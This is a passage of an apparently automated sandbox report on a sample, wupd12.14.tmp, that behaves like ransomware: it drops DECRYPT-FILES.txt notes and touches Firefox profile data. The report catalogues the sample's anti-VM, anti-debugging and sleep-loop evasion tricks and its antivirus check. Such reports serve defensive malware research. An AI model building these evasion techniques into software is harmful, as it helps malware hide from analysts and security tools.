Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect virtual machines (SLDT)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Code function: 5_2_00414979 sldt word ptr [eax]

5_2_00414979

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Window / User API: threadDelayed 365

Jump to behavior

Found large amount of non-executed APIs

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

API coverage: 0.8 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp TID: 3700	Thread sleep time: -21900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2220	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\notepad.exe TID: 2512	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2812	Thread sleep time: -120000s >= -30000s	Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: wupd12.14.tmp, 00000005.00000003.420956176.02D50000.00000004.00000001.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: wupd12.14.tmp, 00000005.00000003.420956176.02D50000.00000004.00000001.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK

Queries a list of all running processes

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality to read the PEB

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov ecx, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov eax, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov esi, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov ecx, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov esi, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov ecx, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov eax, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov edi, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov ecx, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov eax, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov edi, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov eax, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov esi, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov esi, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov edi, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov edx, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov edx, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov edi, dword ptr fs:[00000030h]	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 mov edx, dword ptr fs:[00000030h]	5_2_004219E0

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: wupd12.14.tmp, 00000005.00000002.595898600.00790000.00000002.00000001.sdmp, notepad.exe, 0000000D.00000002.602395655.004F0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: wupd12.14.tmp, 00000005.00000002.595898600.00790000.00000002.00000001.sdmp, notepad.exe, 0000000D.00000002.602395655.004F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: wupd12.14.tmp, 00000005.00000002.595898600.00790000.00000002.00000001.sdmp, notepad.exe, 0000000D.00000002.602395655.004F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Code function: 5_2_0043B823 cpuid

5_2_0043B823

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt VolumeInformation			Jump to behavior

Contains functionality to query windows version

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Code function: 5_2_004010A0 GetVersionExA,MoveFileExA,_memset,GetWindowsDirectoryA,_memmove,CreateFileA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,CreateFileA,_strstr,WriteFile,WriteFile,WriteFile,WriteFile,

5_2_004010A0

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\addons.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\blocklist.xml	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\bookmarkbackups\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\content-prefs.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\events\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\store.json.mozlz4	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239458107.804b5b8e-3057-4315-ada7-6389f240c010.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239617617.0675a2f8-c025-4cb1-98bc-4a943648cf69.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239777499.026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\session-state.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\state.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\WINNT_x86-msvc\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.info	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.voucher	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\gmpopenh264.info	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\state.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\mimeTypes.rdf	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\minidumps\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\permissions.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\pluginreg.dat	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\0675a2f8-c025-4cb1-98bc-4a943648cf69	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\804b5b8e-3057-4315-ada7-6389f240c010	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search-metadata.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionCheckpoints.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20150305021524	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20151216175450	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\.metadata	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\.metadata	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\times.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\DECRYPT-FILES.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\webapps.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webappsstore.sqlite	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\xulstore.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

WMI Queries: IWbemServices::ExecQuery - Select * From AntiVirusProduct

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionCheckpoints.json	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.voucher	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20151216175450	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\mimeTypes.rdf	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\.metadata	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.info	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\events\5e4c085c3c4e0000.tmp	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239777499.026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\content-prefs.sqlite	Jump to behavior
